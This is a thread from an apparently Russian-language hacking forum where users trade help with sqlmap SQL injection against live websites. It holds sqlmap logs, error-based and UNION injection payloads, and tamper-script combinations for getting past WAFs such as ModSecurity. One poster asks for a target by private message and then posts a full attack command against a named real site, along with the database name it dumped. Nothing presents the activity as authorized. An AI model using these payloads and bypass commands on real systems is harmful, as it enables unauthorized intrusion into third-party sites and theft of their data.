Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    213
    Likes Received:
    9
    Reputations:
    1
    [08:04:48] [WARNING] there is a possibility that the target (or WAF/IPS) is drop
    ping 'suspicious' requests

    Как можно обойти?

    [08:04:48] [CRITICAL] connection timed out to the target URL. sqlmap is going to
    retry the request(s)
    [08:06:18] [CRITICAL] connection timed out to the target URL
    [08:06:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to
    retry the request(s)
    [08:08:19] [CRITICAL] connection timed out to the target URL
    [08:08:19] [INFO] URI parameter '#1*' appears to be 'OR boolean-based blind - WH
    ERE or HAVING clause (NOT)' injectable (with --string="write")
    [08:08:19] [WARNING] in OR boolean-based injection cases, please consider usage
    of switch '--drop-set-cookie' if you experience any problems during data retriev
    al
    [08:08:19] [INFO] checking if the injection point on URI parameter '#1*' is a fa
    lse positive
    [08:08:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to
    retry the request(s)
    [08:10:19] [CRITICAL] connection timed out to the target URL
    [08:10:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to
    retry the request(s)
    [08:12:19] [CRITICAL] connection timed out to the target URL
    [08:12:19] [WARNING] false positive or unexploitable injection point detected
    [08:12:19] [WARNING] URI parameter '#1*' does not seem to be injectable

    ваф не дает прокрутить скулю
     
  2. ex3x1

    ex3x1 New Member

    Joined:
    14 Sep 2019
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Доброго дня! К примеру знаю что в БД есть строка с почтой [email protected], но имя таблицы и колонки не знаю т.к. они имеют рандомные названия типа "dfdwydponefdxb". Как выполнить поиск по всей БД и найти в какой таблице есть запись с [email protected]?
     
  3. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    229
    Likes Received:
    58
    Reputations:
    5
    Доброго вечера, ребята. Актуальный вопрос, может есть готовый тампер под - Imunify360 (CloudLinux) waf, либо может взять что-то из готового и переписать?
    Уж один сладкий вариант подвернулся))
    Всех с наступающим Новым 2022 Годом.
     
  4. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    213
    Likes Received:
    9
    Reputations:
    1
    Code:
    Parameter: JSON #1* ((custom) POST)
        Type: error-based
        Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
    ause (UPDATEXML)
        Payload: {"username":"test' AND UPDATEXML(7256,CONCAT(0x2e,0x716a7a7071,(SEL
    ECT (ELT(7256=7256,1))),0x71627a7671),5155) AND 'kFiU'='kFiU","password":"test"}
    
        Vector: AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[D
    ELIMITER_STOP]'),[RANDNUM1])
    ---
    [12:20:48] [INFO] the back-end DBMS is MySQL
    web application technology: PHP 7.2.34
    back-end DBMS: MySQL >= 5.1
    [12:20:48] [INFO] fetching database names
    [12:20:48] [PAYLOAD] test' AND UPDATEXML(3717,CONCAT(0x2e,0x716a7a7071,(SELECT C
    OUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA),0x71627a7671),8364) AND 'Bbs
    S'='BbsS
    [12:20:49] [WARNING] the SQL query provided does not return any output
    [12:20:49] [INFO] falling back to current database
    [12:20:49] [INFO] fetching current database
    [12:20:49] [PAYLOAD] test' AND UPDATEXML(9975,CONCAT(0x2e,0x716a7a7071,(MID((DAT
    ABASE()),1,22)),0x71627a7671),9057) AND 'rvrx'='rvrx
    [12:20:49] [DEBUG] performed 1 query in 0.65 seconds
    [12:20:49] [CRITICAL] unable to retrieve the database names
     
  5. exe-world

    exe-world New Member

    Joined:
    6 May 2022
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Ребят помогите как запихнуть в sqlmap
    есть бага site.de/index.php?view_id=-11'+/*!12345UNION*/+/*!12345SELECT*/+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+
    работает название бд выводит но sqlmap не видит что линк уязвим пробовал и темперы разные тупо 403 выводи в логе sqlmap
    руками получается вывести version 10.2.43-MariaDB-cll-lve получается вывезти user
     
  6. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    443
    Likes Received:
    348
    Reputations:
    5
    очень похоже на модсекьюрити, надо тампер либо искать либо перепилить готовые, тут тема обхода https://forum.antichat.com/threads/425295/
     
  7. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    98
    Likes Received:
    13
    Reputations:
    1
    what MYSQL version ?

    https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3
     
  8. exe-world

    exe-world New Member

    Joined:
    6 May 2022
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
  9. exe-world

    exe-world New Member

    Joined:
    6 May 2022
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Попробовал как у автора from {f information_schema.tables} блочит 403 выдает и все
    просто '+/*!12345UNION*/+/*!12345SELECT*/+1,{f version()},3,4,5,6,7,8,9,10,11,12,13,14,15,16--+ работает версия выводится
    Пробовал в ручную как у автора тут
    Тоже тупо блок может это не модсекьюрите?хотя конечно очень похоже
     
  10. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    98
    Likes Received:
    13
    Reputations:
    1
    test versionedkeywords,between,unionalltounion tamper scripts together
     
  11. exe-world

    exe-world New Member

    Joined:
    6 May 2022
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    [13:53:45] [CRITICAL] all tested parameters do not appear to be injectable
    [13:53:45] [WARNING] HTTP error codes detected during run:
    403 (Forbidden) - 3438 times, 501 (Not Implemented) - 12 times
    К сожалению tamper не помог
     
  12. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    98
    Likes Received:
    13
    Reputations:
    1
    send me your target link via pm
     
  13. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    98
    Likes Received:
    13
    Reputations:
    1
    python3 sqlmap.py -u "https://mkeducationalsupplies.com.au/viewproduct.php?productid=364*" --level=4 --risk=3 --random-agent --batch --dbs --tamper=between,modsecurityversioned,randomcase,space2comment,unionalltounion --fresh-queries

    available databases [1]:
    [*] mkeducat_books2019
     
    exe-world likes this.
  14. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    98
    Likes Received:
    13
    Reputations:
    1
    What is wrong in request ?

    python3 sqlmap.py -u "http://stat.com/service.php" -p 'type' --risk="3" --level="3" --method="POST" --data='{"appFrom":"","appId":"","appName":"City","module":"install-broadcast","op":"setup","packageAppName":"ar.ity","position":"","type":"0","action":"postyyt","channelId":"cdy5e1e1a","mac":"F4:9y3:9F:F8:2A:80","marketVersion":"launcher_5.0.8","userName":"-1","version":"6.2.1"}' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36" --headers="Host:stat.com\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nConnection:Close\nContent-Type:application/json;charset=UTF-8" --dbms="MySQL" --batch

    [05:55:43] [CRITICAL] all testable parameters you provided are not present within the given request data #5108

    P.S also checked "type" and 'type' in -p and in request data

    P.S.S sqlmap -r request.txt doesn't work in this case ( and this payload workable, because other scanner can execute sql query with this payload
     
Loading...